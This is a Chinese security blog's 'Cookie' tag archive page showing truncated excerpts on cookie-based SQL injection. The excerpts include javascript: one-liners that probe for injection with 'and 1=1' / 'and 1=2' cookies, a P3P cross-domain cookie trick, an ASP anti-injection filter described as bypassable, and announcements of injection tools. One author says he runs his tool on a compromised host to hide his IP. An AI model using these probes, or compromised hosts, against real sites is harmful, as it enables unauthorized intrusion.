标签 ‘Cookie’ 下的日志
判断cookies注入的js语句
作者:lcx
来源:vbs小铺
javascript:alert(document.cookie="参数= "+escape("参数值 and 1=1"));self.open("http://+"document.location.host+document.location.pathname);void(0);
javascript:alert(document.cookie="参数="+escape("参数值 and 1=2"));self.open("http://+"document.location.host+document.location.pathname);void(0);
哎,还是在新窗口打开了,不过比网上流传的省了一步刷新和返回了。
Tags: Cookie, JavaScript, SQL Injection, SQL注入通过设置p3p头来实现跨域访问cookie
By:lcx
今天在w3网站上看到了一篇介绍p3p的文章(http://www.w3.org/TR/P3P/),利用这个可以实现跨域访问cookie,我也试验一下。
其实很简单:试验用了2个域名readlog.cn和diaor.com
首先在readlog.cn下放置一个文件setcookie.php 内容:
PHP代码
<?php
header('P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM 阅读全文 »网软天下企业网站管理系统cookies注入漏洞
by :vera
网软天下企业网站管理系统很多参数都是直接用request("id") 来接收参数,为什么他们那么放心呢?原来他们都包含了一个非常流行.很多ASP程序里都用的防注入代码,真的只需在有参数提交的文件中include防注入文件就是了安全吗?我们来看看这个防注入文件。
Check_Sql.asp
<%
Dim Query_Badword,Form_Badword,i,Err_Message,Err_Web,name
'——定义部份 头———————————————————————-
Err_Message = 1 '处理方式:1=提示信息,2=转向页面,3=先提示再转向
阅读全文 »
MSSQL cookie注入工具[web版]
鬼仔注:我把代码放到了一个单独的txt中,大家看的时候注意那个txt的链接。
文章作者:Mika[EST]
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
俺前些日子发的那个cookie注入辅助工具php版,由于是命令行下解析执行的,所以一般都只能在本机执行(在肉鸡上你需要安装php解释器),用起来也不方便。而且输出的信息也比较难看。正好前些日子做测试的时候,俺抓到一只台湾鸡,支持php。于是俺就想把这个工具写成web版的,放到肉鸡上去执行,这样既能节省本机资源,而且又比较隐蔽(能隐藏自己的IP,而且可以访问到GFW不让你访问的站),对我唯一的难处就是我不太懂html,上学的时候学的都是用dreamweaver做个简单的网页。但是现在我一没有dreamweaver 阅读全文 »
Tags: Cookie, MSSQL, SQL Injection, SQL注入MSSQL错误提示开启下的 COOKIE注入辅助工具[php版]
文章作者:MIKA[EST]
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
好久没发帖子了,嘿嘿~~~上班了,很少能上网了哦~~~~昨天俺回到家,学校领导给俺打电话说让俺帮忙检测一下学校新更新的网站安全做得怎么样,哎~~~虽然俺一百个不乐意但是领导的面子还是要给的嘛
结果,找了N久也没找到什么洞洞可以用的(PS:俺的水平本来就不怎么样嘛),给领导打电话汇报了一下,说什么花钱买的就是比自己做的好(PS:原来的是俺做的,安全性确实差了点,但俺要求用php写,领导非不让,结果用asp俺是一边看着参考一边写的,能完成就不错了,根本顾不上安全不安全了),俺一听这话可真是气不打一处来,扔下电话俺就给BF打电话,还真灵。半个时辰的工夫,他就在QQ上给俺发了过来:
阅读全文 »
